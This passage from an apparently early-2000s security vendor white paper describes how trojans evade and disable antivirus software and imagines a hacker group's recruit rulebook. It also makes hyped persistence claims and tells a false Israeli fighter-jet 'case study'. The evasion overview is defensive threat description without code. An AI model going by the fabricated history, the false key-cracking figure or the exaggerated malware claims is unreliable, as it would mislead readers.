has circumvented them all, before he begins his attacks.
Only by accident will the Trojan be captured. Of course the Trojan Master will take care to elude capture as
long as possible. Even after capture and detection the Trojan Masters have many tricks to eek out some more
effectiveness from their software. Utilizing UPX encoding and / or Morphine to cloak their software (See
Reference section) The Captured Trojan can be given a new lease on life as a variant that once again eludes
the signature-sniffing anti-virus software. In short, countermeasures don’t work at first and thereafter are
only partially effective.
Trojan Hunter screen shot: In order to find a Trojan it must already have been captured. Also
this software detects the Trojan only AFTER it has already run on your system.
CONFIDENTIAL
Page 18 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
Counter Measures
TDS3 A Trojan countermeasure program in action. One of the better systems on the market but
still vulnerable to new or mutated “Undetectable” Trojans.
Anti-Anti-Virus functionality.
We have mentioned how the Trojan Masters are quite able to design a Trojan that eludes all known detection
systems, at least at first. We have also described how the Trojan can be cloaked to hide even from updated
anti-Trojan software. However, there is a third technique now a “standard feature” in all Trojan programs.
Active attack against the anti-Trojan software. The Trojan is designed to detect the presence of the AntiVirus / Anti-Trojan program then attack the software. The capabilities vary from Trojan to Trojan and range
in sophistication from downright blatant deletion of a key file resulting in an inelegant “crash” of the Antivirus software to the subtle modification of certain signature files so that the anti-Trojan software has a
“Blind-Spot” enabling the attacker software to remain undetected. Some of the more sophisticated Trojans
even go so far as to monitor Anti-virus updates in order to preserve this blind spot. One Suite went so far as
to emulate the entire Anti-Virus program. (Though this proved to be untenable over the long term).
Vanquish, a popular Trojan suite boasts the ability to defeat 85 different Anti-Virus- Anti-Trojan products.
The Security Community response
The security community, as a whole, is not prepared for this form of crime, in as much as they are not able
to detect nor eliminate these types of control and exploitation systems. Yet, there is an element of the
security community that is indeed aware of what is coming, those that call themselves “Grey Hats” (Part time
hackers and full time professional security consultants.) There are, of course White Hats, and certainly we are
well aware of the Black Hat variety. The Grey Hats are in the curious position of being responsible for the
computer security of the company, which is paying their salary, yet on the other hand keeping on the inside
of the Black Hat hacker community. This balancing act is made possible by the use of anonymous handle
identification, John Smith by day and Phineas Phreak by night. In the persona of Phineas Phreak, the Grey
Hat can keep abreast of the latest in hacking techniques while still performing his daytime duties as a security
officer. This is the curious world of the hacker today, now let us consider tomorrow’s dilemma.
CONFIDENTIAL
Page 19 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
The Mature Hacking Corporation
Imagine for a moment, an organization of hackers, hypothetical, of course, with a structure consisting of a
loose conglomeration of hacker “cells,” with each cell consisting of 10-12 hackers having low to medium skill
levels. Let us equip these would be hackers, known in hacker parlance as ’Script Kiddies’ with an easy-to-use
hack-kit consisting of a suite of programs with a point-click-hack interface. Using this kit, the script kiddies
can take over and manage a multitude of computers. They can play around a little with their victims;
naturally any software that they may find is theirs to keep. Doesn’t this seem like an attractive proposition for
the Script Kiddy? Indeed, they get a full suite of hacker software and virtually unlimited potential of obtaining
free software.
Moreover, they are now part of a team, their ten partners known to each other only by their hacker “handles”
form a mutual support group. They can exchange tips, news, gripes, etc. with their new peers. All
communication is conducted anonymously via mailboxes posted on the victims’ computers; for live chat, the
pro hackers have provided a victim-hosted chat room via NetMeeting, what fun! The Script Kiddy is in
heaven! --Logging onto the chat room late at night to discuss with his secret cohorts the teams’ latest
conquests. Perhaps to turn their latest victim into a backup chat room, or an FTP site from which newly
Trojanized victims automatically download the updates that further compromise their security, maybe even a
source library for themselves to store the tools and hacker-ware needed for every eventuality, perhaps even
a web site to which new victims can be lured for their dose of Trojan poison? The possibilities are endless!
Each group, of course, has a leader. These leaders, technical gurus, are a rather more sophisticated than the
Kiddies who will work for free software. These leaders are paid in cold cash, perhaps as a percentage of the
“take.” But just what is the “take?”
CONFIDENTIAL
Page 20 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
The “Take” (Money to Be Made)
Large sums of money are involved in the higher echelons of cyber crime. Consider for example the design
specifications for the latest Intel chip which are at this moment resting on a server in San Jose, or the tool
design drawings for the next generation military advanced tactical guided missile carrier scheduled for release
two years hence, lying waiting to be copied on a workstation in Maryland.
The fundamental pre-patent design drawings for a revolutionary blue laser diode are to be found on a server
in Tokyo with 350 known vulnerabilities!
Or perhaps the marketing plans and release dates for a series of entertainment software titles would be of
interest to a rival company?
There are industrial spies and there are unscrupulous corporate “researchers” who are paid for the accuracy
of their predictions about the competitive market, without regard to the means of deriving that accuracy.
CONFIDENTIAL
Page 21 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
The Take - Continued
Consider how it is that the Chinese government is able to confidently pony up the tens of Billions of Dollars
required to build an advanced chip fabrication factory, despite the present absence of a chip design…
Chintel?
Yes, intellectual property theft is very big business. Consider the movie industry – every newly released
movie is for sale in Taiwan, China, and Korea for less than a dollar as a DVD or VCD disc, often weeks before
the premiere theatrical release.
What of the recent WTO membership by the Chinese? There is little hope of change. The Chinese premier
has been quoted, “It is difficult to change the habits of a people developed over a hundred years. We are
used to not having to pay for our video entertainment.” Furthermore, as it is obvious that any copyright
enforcement activities will be investigated and policed by the Chinese themselves, there is little incentive to
devote too many resources to protect the profits of the Hollywood conglomerates.
Hollywood has long given up on revenues from VHS and DVD sales in such countries. These losses, though
staggering in size, are built into their cost structure.
Similarly, in another intellectual property business, video games, a company creating a game with a
development cost of 5-7 million dollars might see their latest release posted free of charge on a warez site,
even while the master CDs are still being replicated prior to the official launch. Even with expensive copy
protection, the video game industry never sells significant numbers in China and only expects to realize about
ten percent of the potential sales in Eastern Europe. Similarly for Korea, Russia, Vietnam, and several other
non-Bern Convention countries, there are few revenues to be realized.
CONFIDENTIAL
Page 22 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
High-Value intellectual property theft - A case study:
The state of Israel is surrounded by hostile countries that have been equipped with the latest Mig 29 fighters
from the Russian military establishment in exchange for hard currency and / or oil. Naturally, for its own
national security, Israel requires “air superiority” fighter jets. The French company Dassault initially supplies
these jets, specifically the “Mirage.” However, political tides change and the French, presumably under
pressure from the Arab league, refuse to continue these sales and, more importantly, refuse to supply spare
parts for previous sales. What to do? Build their own? But what of the airframe design and the design of the
machine tools to build it? Fortunately for the Israeli nation, they have built up one of the best hacker teams
in the world. --A whole division of full-time Israeli army officers and talented national-service conscripts. Their
military mission: to scour the world for data, design “gold.”
When the Dassault Company unveils their most advanced stealth fighter yet, the “Raphael,” they once again
refuse to sell to the Israelis.
Just one year later, Israel test flies its own home-built fighter, the “Kafir.” To the millimeter identical, with a
few minor improvements. Nicknamed “Son of Raphael” by industry wits.
There is money -- Enough to finance a full-time team of technical helpers for “Script Kiddies”. Swat teams to
clean up their errors, quick-fix teams to deal with new situations, and a large development fund to assist the
Trojan Masters in improving their core software.
CONFIDENTIAL
Page 23 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
Hackers Need Discipline Too
A competent pro-hacker can enlist droves of Script Kiddies with very little effort. But what good are
hundreds of kiddies running amuck in cyberspace? Without discipline, these kids will reveal themselves and
their software to the security community, and then before any real treasure can be found, the White Hats will
move in and close all of the doors that the pros have worked so hard to open and preserve. No. There have
to be rules, a code of conduct, rewards and punishments. In short, a structure. How do you inject discipline
into such a mob of anonymous, unruly and clearly unethical louts?
With the support and infrastructure in place, expansion can be exponential. Script Kiddies are
“two-a-penny,” but there has to be a code of conduct – a rulebook. Let us hypothesize as to
what these rules might look like.
WolfPak
WELCOME TO THE PACK! You have already received your starter kit. Please be cautious with it. The kit has
been personalized and assigned to you and you only, if it should get into the wrong hands, your kit will
automatically let us know and you will be cut off from the pack, or worse, the pack may turn its guns on you!
So keep it well hidden on the CD or in the hidden partition on your hard drive and never, never, write down
your password. Remember, just one slip up and you will ruin the fun not only for yourself but also for the
entire WolfPak.
Currently there are 356 known vulnerabilities in Windows software, 204 in MAC OS X, and 118 in UNIXLINUX. Your scan kit can identify all of them and use any one of them to insert the starter Trojan into the
victim. To select a victim, you can scan IP addresses randomly or target a specific IP address or web address.
Either way it will only be a matter of minutes before you will have your first victim bagged! Good hunting,
Wolf Cub!
INCLUDED IN YOUR KIT:







IP address stealth scanner and vulnerabilities analyzer.
Penetration launcher and Trojan inserter pack.
Service & DLL Injector.
Stealth Server modules.
Manager control interface to view the status of your managed accounts.
Distributed transaction co-coordinator to route your booty safely to you anonymously.
Upgrade scheduler, lists the maximum speed of take-over allowed for each account.
Remember, we do not try to take over your victim too rapidly or the victim will notice the sudden change, if
they notice and start poking around, you may have to nuke them, and this is bad for business! Besides, too
many nukes and you will lose points with Doctor ToM (The Big Boss.) Points are earned by logging your
victims into Dr. ToM’s victim site. When the group reaches 1000 points, we are promoted and will be allowed
to get the next generation software (Which is even more awesome). If your individual scores are high
enough, you will be able to recruit a team of your own. Imagine having the loot from ten hackers dropped on
your machine each day. You will need a new hard drive! Now the rules:
CONFIDENTIAL
Page 24 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
WolfPak Rules
The Golden Rule You must never reveal the software to anyone!
Once the starter Trojan is in, it will call you when it is ready. Do not try to move ahead before this.
You may toy with the victim, but only with approved tools. Never use your own or other hacker tools.
You must log on to one of ToM’s sites once every two weeks. Your victims will be automatically logged.
Never give your true name or personal data. Not even to a fellow WolfPak member. We are always
anonymous.
If you hit a problem with the software, call a NetMeeting, preferably on the victim’s system and the Pak will
help. In a real pinch we can call in a manager, or a hack-tech support guy.
If the manager thinks it’s worth it, he may call in a quick-fix team. (Usually to fix up an exposure issue.)
Don’t do this it upsets ToM!
If your victim shows signs of catching on, put your software to sleep. The kit is totally undetectable in this
state.
If the hidden SQL database is exposed in any way, delete your software and nuke your victim immediately! If
you have any trouble removing your software, call in a manager.
Occasionally, a manager will request priority override and take a particular victim off your roster. If a
Manager says stay clear, STAY CLEAR!
Apart from that, All software you find is yours to keep!
That’s about it. Happy hacking, Wolf cub!
A scary scenario? Our hypothetical hack group could grow exponentially logging
hundreds, if not thousands of managed machines each week, becoming less easy
to detect as more experience is gained in the field. Lucky for us, this is just a
fantasy…
CONFIDENTIAL
Page 25 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
High-Value Intellectual Property in today’s connected World
By way of an example of high-value Intellectual Property (IP), we will examine the issue of compressed
theatrical films, (The very property which was the subject of LoudWolf’s initial research)
A compressed movie is small, yet maintains all the quality of the studio master. It is intrinsically a high-value
item for a Cyber Pirate, who can use such a high quality master to create DVDs, VCDs, and other physically
distributable copies. More likely, however, since a compressed file can be distributed via the Internet at
speeds better than real time, the pirate would, most likely, opt for electronic re-distribution. The initial
thieves will be able to charge for the property at first, but sooner or later, a leak will occur and the property
will become freely traded over the Internet, essentially becoming public domain from there on. The Cyber
thief makes a small profit the property owner faces a catastrophe!
Imagine if you will, a library of all Disney movies resting on a server somewhere, earning money both for the
Internet operator and the studio. Now imagine that one of our WolfPak members stumbles upon the server to
discover a goldmine of IP. In less than 24 hours, all of the property will have been copied off the servers and
within a few more days, it will be traded across the globe as a freely “swappable” item. The future income
potential for the entire library has been all but wiped out! A disaster for the studio and the Internet operator.
We call this scenario “A catastrophic-loss.” Once lost, it is lost forever. A single occurrence is all it takes.
Consequently, we have to design a system that prevents even a single loss, not one, not ever, not even
99.9% secure. The system must be absolutely secure – 100% and nothing less is acceptable.
This catastrophic-loss potential, has the effect of nullifying the income potential of the property. The fear of
such a loss, in many cases, prohibits certain uses of the property. In the case of the movie industry, the fear
of such catastrophic-loss has prevented the development of movies-on-demand over the Internet for many
years.
There are a wide variety of properties that fall into the category of High-Value IP. In general terms when the
potential for loss has huge consequences, it has a powerful restraining effect on technological development.
This restraint has been in place for many years now, ever since the “Napster Debacle” deflated the music
industry’s profits. Currently, in all areas of industry where high-value intellectual property is the “Stock-intrade” the owners of these properties have been both unwilling and unable to take advantage of the Internet
revolution and realize potential profits from their properties in the “connected” World. Preferring to keep their
property on low-tech media and continuing to utilize traditional distribution methods. Some examples of these
industries are.
Music
Movies
Television
Book publishing
Educational curriculum publishing
Professional training
Magazine publishing
News Paper publishing
Digitized art
Statistical research
Scientific data
Secure communications
Industrial design data
It is not difficult to understand why industry is fearful of entering into markets where their valuable IP is put
at risk. Imagine the industry executive charged with evaluating the risk in face of the following “Hacker
quotes”.
CONFIDENTIAL
Page 26 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
Hacker Quotes.
Some of the more memorable quotes regarding security of computer systems made by the hackers
themselves.
“No security is absolutely foolproof, the best you can ever hope for is that to have a system
that is so costly to hack that the reward does not justify the effort.”
“Obscurity is not security, merely burying the property deeply using tricky algorithms and
bolstering up your chances of remaining obscure by surrounding the value property with lots
of ‘chaff’ will not hold up for long. In fact the time to discover and steal for this type of
system is less that the time to spent to obscure and hide the property. Especially if you have
rough idea of what you are looking for!”
“Cryptographic solutions will never work. All codes can be broken; the cost for breaking a
PGP 1024 bit key is currently running about $250,000. If I want to break your code that
much I just have to pay that much. That is how much it costs to try every possible key in the
1024 bit key space, likelihood is it will crack at half that price.”
“So-called unbreakable crypto is not! It is just not used enough for someone to bother with.
And by the way, real hackers don’t let you know that they have broken your code.”
“In over a decade of hacking it has never been necessary to break into crypto. It is much,
much easier to break into your system and steal your crypto keys.”
“If the strength of the cipher used in the cryptographic algorithm is strong, then the code will
be cracked only by brute force methods like trying every possible key but it will indeed be
broken. The only way to make breaking of the code less likely is to make the key long
enough so as to make the breaking of the code ‘computationally infeasible’. Even then, it is
merely a deterrent, as computers get faster all the time what was once computationally
infeasible becomes trivial.”
“Crypto, Real Crypto, is hard. I don’t bother with it. I can get anything I want, any-time. The
only thing that ever stops me is when I see custom error messages, that spooks me a bit.”
“I swiped the private key the moment it was made, the keylogger sniffed the pass-phrase so
I got it as it was typed but I don’t need all that stuff coz the document was lifted off the
system before it was encrypted.”
“OK so you are using an international version of PGP and you have got 4096 bit keys. Pretty
good, huh? And you are going to send the key over the wire with the data? That may pose a
problem.”
CONFIDENTIAL
Page 27 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
ANALYSIS OF CURRENT HACKER SOFTWARE
Analysis of current state-of-the-art hacking software reveals several startling new discoveries.
With serious consequences for the security, system software and computer hardware industries.
Purpose of this Document
In order to better appreciate the current and future demand for a new generation of security related
products, we must first understand the nature of the security threat. Our security products have been
described as, “innovative,” “thorough,” and “comprehensive” by various security experts. In more informal
feedback we have received comments such as, “they have gone to extreme lengths to secure the data” and
even, “excessive security measures are implemented…”
We will describe in this document many of the sophisticated methods hackers now use as well as others that
are, “on the technological horizon.” Then, by extension, we will describe the future challenges we must
address. Our security solutions are tailored to meet these challenges, using several new and unique
techniques. Our methods, incorporated as they are into comprehensive security solutions, are neither overly
cautious nor excessive; they are the natural and inevitable consequence of a considered response to the
burgeoning threat. In other words, these products were born out of necessity to combat real attacks.
The newest generation of hackers has been able to consistently breach or circumvent traditional concepts in
security. Patches, updates, and service releases are after-the fact “catch-ups” to the hackers’ dominance.
We have no choice but to engineer a paradigm shift. Our mission is to achieve this shift while incorporating
the legacy and reality of the computing world. Our products cover many areas of security, ranging from the
high-end military to our consumer “peace-of-mind” products. Our products are designed to unobtrusively
move current “permissions based” security to a “process based” paradigm. Other products address a shift
from software-based integrity verification to a hardware system. Still, more of our systems shift us from a
software certificate (Network of trust) type system to a positive recognition system.
We have developed numerous sub-systems and products in addition to those based on the “design shift”
described above, again out of necessity, the driving force behind all of our products is the recognition of one
simple truth.
Current security systems and existing architectures are no longer considered secure!
A well-designed and fully hardened system using current best practices can be compromised. All of our best
security efforts to date amount only to raising the degree of skill required to break in. However, in the world
of software, such skill may be easily and quickly acquired by the use of professionally designed hack-tools.
Moreover, the ranks of these “tool users” are growing. As we will describe, the combined skills of these tool
users, when marshaled together and coordinated effectively, present a threat not only to individual systems,
but to entire networks, including small companies, large companies, and even entire business sectors.
CONFIDENTIAL
Page 28 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
ANALYSIS OF HACKER SOFTWARE - Continued
Cautionary Disclaimer
The expression, “your mileage may vary” was first promulgated as an innocuous piece of “legalese” by the
American motor industry. It was intended to curb the number of lawsuits regarding actual miles-per-gallon
engine performance experienced by customers versus the stated average performance as tested by the car
maker under, presumably, ideal conditions. These days, the expression has all but been forgotten except for
certain segments of trade who have persisted in applying this “catch phrase” to their own line of work.
The software industry uses the phrase as a post-script caution and general disclaimer of responsibility. In the
software industry, “your mileage may vary” has become a wry comment often attached as the last line of any
specific troubleshooting recommendation.
The “your mileage may vary” statement is most applicable in the context of describing the effects you might
see in a computer system as it is “taken over” by the team hacker software described in this document. It is
most appropriate because this software suite is designed, or rather has evolved to be both infinitely flexible in
its operational capabilities and stunningly unpredictable in its sequencing and approach. The reader must
understand that we are describing a relatively new phenomenon in the software business— that of the
database- driven, semi-autonomous suite of scriptable modules deployed and delivered to the target by
means of asynchronously scheduled and non-guaranteed delivery protocols. What a definition!
Nobody, not even the author-attacker can accurately predict the attack pattern. He sets up the rules, designs
the goals, and assembles the tools and modules, but the active software itself makes many decisions as well.
Moreover, the attack is deployed, programmed and controlled by teams that may have widely differing goals
and morals. Traditional software analysis in the formal manner would be quite convoluted. IE: A of a series
of linear statements along the lines of
This is what it does first…
Here is the filename, the function calls, the methods used, and the results returned
This is what it does next…
More file names, function calls, methods and results…
This form of analysis is would be a ludicrous folly if applied to the monster of a package we are dealing with
here. A linear analysis statement such as the one above would run several hundred pages and then only
serve to describe one out of the thousands of equally possible through-lines of action. Effectively assessing
this new phenomenon requires new and innovative analysis tools, tools we spent months developing. And
even with these tools, it took us another many more months of intense research to reach the point where we
could lay open examples of the captured software and fully document its capabilities.
Design Rules as a Way of Describing Software Functions
The presentation of software functionality by way of a series of assumed DESIGN RULES will be used
throughout this document. This method is preferred since it expresses a general trend of functionality as
observed during many tests, rather than specific functions which would be too numerous to describe. We will
describe a rule only if we have seen a statistically clear majority of tests trending towards a particular goal.
This goal then leads us to formulate a set of hypothetical design rules. These derived rules may bear no
resemblance to any actual design methodology. However, they seem to be both consistent with the
observable facts and have already proven to have a great deal of predictive accuracy. The rules method is a
convenient form of shorthand, which not only reduces the required volume of documentation, but also, goes
some way towards providing the data we have used to anticipate likely next steps in development of this
entire class of software.
CONFIDENTIAL
Page 29 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
ANALYSIS OF HACKER SOFTWARE - Continued
Engineer’s Notes on Descriptive Style
We must apologize in advance for the rampant anthropomorphism expressed from time to time. We know
that most of the time we are dealing with a software ROBOT (or BOT), but since a well established Trojan
exhibits behaviors that are highly responsive to software challenges and interact closely with us as we
experiment it is inevitable that we imbue these BOTs with all sorts of emotions and planning capabilities,
which they clearly could not possess.
All other deviations from a strict scientific software analysis are entirely contrived since we are not trying to
present a scientific analysis. There are plenty of facts to be digested here in this summary and there is ample
statistical data in the full lab data to support all the conclusions, opinions and guesses presented here with
full scientific rigor. In a first draft of this document we gave into the temptation and supported every
reasonable opinion with bucketful of factual data and a statistical proof. Needless to say it read like a
Chinese phone book!
Deadlines compel us to abandon such rigor and submit this document, dubbed internally “The Backlash”. No
statistics, no software listings just the bare facts along with the “Corn Ball” Engineer humor. (Which was left
in to up the page-count a bit.) We will attempt to make what would otherwise be a dry, sometimes chilling
and technically difficult description more accessible to the non computer-professional. Corny titles and hints
of (nay outright) sarcasm throughout the remainder of the software analysis are to be expected.
The Threat, an Overview
General Description, History and Development Status
The latest professional hacker software is a virtual, “Swiss army knife” of carefully selected modules. These
modules are capable of scripted database-driven operations. The controlling database is held locally on the
victim’s system, which in turn, is directed by its human manager via any one of a vast array of
communication protocols - some common, others remarkably obscure. The database can operate
autonomously, as it is capable of goal-based heuristics or rule-based decision making. The software is
revolutionary in a number of areas of functionality by means of its powerful and flexible modular structure.
Specifically, its ability to detect known threatening programs and situations, as well as respond intelligently
and dynamically to the ongoing situation, bringing to bear important new technologies in a coordinated
manner.
The information relating to specific patterns of software behaviors, the goals of the Trojan Masters, and the
functions and methods used, will be presented as accurately as possible with the assurance that all
functionality described has been observed and documented during the course of our research. However, it
must be understood from the outset, that we will inevitably describe a “superset” of the features that any
individual single system may experience “in the wild.” Furthermore, we are certain that there is more
functionality out there that we have not yet seen on any of our test systems.
Also note that the particular combination of installed features used, and the order in which the behaviors are
manifested are, in part, automatically selected by a rule-based system of stored procedures, which select
components according to the equipment and status of the target machine, and are partly manually-directed
according to the whim of the hacker-manager. Suffice it to say that, “your mileage may vary,” should be
assumed to have been added to the end of every functional description in this document.
CONFIDENTIAL
Page 30 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
ANALYSIS OF HACKER SOFTWARE - Continued
Software Goals
Total control of all aspects of the target machine’s functions, data, and operations is the primary goal.
Achieving this goal incrementally over time, without the knowledge of the target user, is the primary
directive. Secondary functions include, but are not limited to, the extension of the controlled namespace by
means of redirecting the target machine’s computational resources towards the provision of database,
connectivity and bandwidth resources in support of the take over of additional targets. The tertiary goal-enable the clandestine use of captured namespace – bandwidth capabilities to be sold to parties that may be
interested in low-cost or anonymous, untraceable bandwidth having the additional feature of being nontraceable in both directions. Other tertiary goals have been noted, including scanning for high-value
intellectual property and subsequent theft, installation and operation of anonymous web servers email
servers, video servers, voice over IP services, application servers, and FTP sites. Scans for and attempts to
use financial data acquired to authorize direct money transfers have occasionally been attempted.
Overview
The various elements that make up the entire suite of hacker software are formulated, to a greater or lesser
extent, under a common design philosophy. We do not have access to a design document; indeed nobody
does, as this software was not designed by an individual or small group. This very special suite of software
has been “evolved” over the Internet. Evolved by an unknown number of anonymous individuals who
themselves could never know the number or names of other contributors. The software is an amalgam of
evolving elements, ever-changing, with various modules being revised, improved and replaced on a weekly
basis. Major overhauls tend to take place about once every two months, while older versions may continue
in active use or evolve in different directions. There is not a definitive current suite, yet as nebulous as this
may sound, it is still quite possible to discern its overall structure and functionality, and even hazard a guess
as to the design rules by means of a careful analysis of a great many variations.
For example, one Trojan is delightfully adept in the utilization of a previously unknown and major design
weakness located in the disk caching systems found in all modern computer systems. The Trojan uses this
important design flaw to give itself the ability to disappear entirely when it senses a threat or other
dangerous activities. This exploit is a huge security gap and an important security issue in itself. An
impenetrable hiding spot large enough to conceal a large Trojan and effective enough to withstand an
exhaustive search using the best discovery tools available is quite a novelty, to say the least.
The same dynamic and intelligent application of novel technologies is exhibited if the Trojan is somehow
detected and an attempt is made to eliminate the offensive “Mal-Ware.” The Trojan’s response is a Pandora’s
Box of clever tricks, which nullifies the standard IT department’s progression of “cures”.
One version of the Trojan evades all cures! It categorically cannot be eliminated!
Nope…
No…
Never…
Not even with that!
HEY BUDDY! Just what part of the statement:
“IT CATEGORICALLY CANNOT BE ELIMINATED!”
are you having trouble with? 
CONFIDENTIAL
Page 31 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
ANALYSIS OF HACKER SOFTWARE – Continued
Standard Information Technology Procedures (With Escalation) on a Trojaned System
So you call in your IT guy to perform a checkup because your computer’s been acting “funny”. Here is an
example scenario.
Step 1
Alternate A
Action: Run virus checker
Result: It is not a virus. The checker finds nothing. The IT guy leaves.
Action: Update checker & run
Result: It still is not a virus. The IT guy leaves, annoyed.
Alternate B
Action: Run virus checker that scans for suspicious activity.
Result: The Trojan has modified the virus checker. IT guy leaves.
Action: Update checker & run again.
Result: The Trojan simulates update, checker, of course, finds nothing
IT guy leaves.
amiss the
Step 2
Action: Re-install all applications from original disks.
Result: The Trojan intercepts install and redirects installer to
install a Trojan-approved custom version of the application.
Step 3
Action: Re-install OS and applications
Result: The Trojan survives the IT guy’s nuke, handily hidden in protected havens:
secret RAM drives, locked page files in memory, hidden & compressed
dblspace drives, locked memory areas allocated to the disk cache, a large
pagefil.sys or hiberfil.sys file saved to the hard drive, or a hidden and
compressed area of an IBM OS2 formatted disk space divided into 8 different
areas, each only accessible via either encrypted access through a secret
“named pipe” or by means of one of several possible distributed transaction
database protocols.
CONFIDENTIAL
Page 32 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
ANALYSIS OF HACKER SOFTWARE - Continued
A Scenario
A chunk of hard drive space has been allocated by folks other than yourself causing your hard disk to be a
little smaller that it should be. By some miracle you noticed it and you just happen to have the time and the
skills required to perform an investigation.
Looking at you hard disk statistics you find X bytes used and Y bytes free. Adding these two numbers reveals
the capacity of your hard disk drive, and you find a little less than you thought you should have. Checking the
literature for the hard disk drive confirms the fact that you have about 2 megabytes less than you ought to
have!
This space will certainly stay allocated to others until you can figure out the following:

That the hard drive is in fact a treacherous liar in that it has for some time been progressively
deceiving the operating system and purposely under-reporting its true size.

Why the hard drive is lying about how big it really is and how to persuade it to tell the truth.
Or

Forget about why the treacherous disk is treacherous, and figure out how to persuade the format
and fdisk programs to stop believing the darn thing and erase it, all of it! Yes the whole darn
thing!
NOW, BRIEFLY, WE WILL EXAMINE THE SPECIAL CASE OF “IF YOU WANT TO READ THE SNEAKY FILES NOT
JUST ERASE THEM!”
All the files are not only encrypted, but password protected, written in a Unicode font which has been
scrambled using an in-memory code page index which you cannot access because it is so severely locked by
constant cache hit locks that not even the processor can get a look at it. Besides, all files will look like
nonsense unless you know the font name, the font language, and the font size with which the original was
scrambled. No don’t bother plodding though all 300 styles, 6 languages and all 30 sizes of each that you do
have. The Trojan makes up its own and you definitely don’t have it.
Besides, all the programs are written in an obscure dialect of Swahili using a virtually unknown programming
language that you don’t know called object-orientated D++ which intrinsically saves its files in irrecoverable
opcode mode and uses disk space sideways 1 bit per track using 32 bit words encoded as binary-coded
decimal in sixteen four-bit words, each 32 bit word using reverse Polish notation with alternating signed and
unsigned integers.
If you haven’t already noticed, the above paragraph is a joke, although certainly in the same vein as all the
other protections built around the secret stuff all of which are simplified explanations but nevertheless true!
The point is, there is a valid reason why this stuff is tough to crack and, with the exception of present
company, still secret.
CONFIDENTIAL
Page 33 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
ANALYSIS OF HACKER SOFTWARE - Continued
BACK TO THE IT GUY WHO IS NOW QUITE CONVINCED THAT YOU ARE NUTS!
HOWEVER, HE WILL BLAST AWAY AT THE TROJAN JUST TO HUMOR YOU.
Step 4
Action: Repartition hard disk drive, format disk, initialize with a military grade secure
erase. (You are impressed, yes?)
Re-install operating system from original disks.
Re-install all application programs from original disks.
Result: The Trojan holes up in a combination of EEPROM on the
video card and a secret portion of hard disk space hidden from the operating
system. After the dust settles, it will re-emerge unscathed! And at the first
opportunity access the internet and re-build any programs the IT, guy’s
efforts have manages to erase.
All seems well. The IT guy leaves having delivered the IT equivalent of a software neutron bomb.
Nothing ever has, or ever could survive such an onslaught. Besides, the user has gone NUTS! The IT guy
has never seen any of the quirky little things reported and each time he leaves, everyone agrees everything
appears normal. In his mind, there was nothing wrong with the system in the first place, but now, postneutron bomb, there is no question about it! If this guy calls a fifth time he is certifiably nuts!
RING… RING…
You:
“Err Hello, look, I know you were just down here, but this machine just accessed the network
and transferred a whole bunch of files to what seems to be a synchronized share folder. I
wonder if you could take a look at this, the data on this machine is really important stuff!”
IT Guy:
“LOOK MISTER! If you think you are going to get me down there on another of your ‘It does
You:
“But it’s random. It does this weird disk access stuff and seems to use the Internet at odd
IT Guy:
“Well of course there is no pattern to it because it doesn’t exist! Looking forward to your
weird things’ reports, you are very much mistaken. You are nuts! Your machine is fine! It’s
your head that needs a tune up. If you would care to demonstrate one of these err... quirks,
I’ll be right over.”
times. There’s no pattern to it.”
‘demo’ of the problem… someday. Goodbye!”
CLICK!
The Trojan has eluded all of the IT guy’s attempts to eradicate it; In this example, virus checkers, reinstalls and even full disk erasure. (Military Grade)
CONFIDENTIAL
Page 34 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
ANALYSIS OF HACKER SOFTWARE - Continued
How It Was Done
The Trojan can withdraw when threatened, placing its code and databases into a hard disk partition which is
hidden from view, invisible to Windows and even DOS. This partition is accessed by the core Trojan program
by means of named pipes and exposed com controls. The core Trojan program is small enough to reside in
the excess space at the end of a programmable chip, (EEPROM in this example) that belonged to a VGA
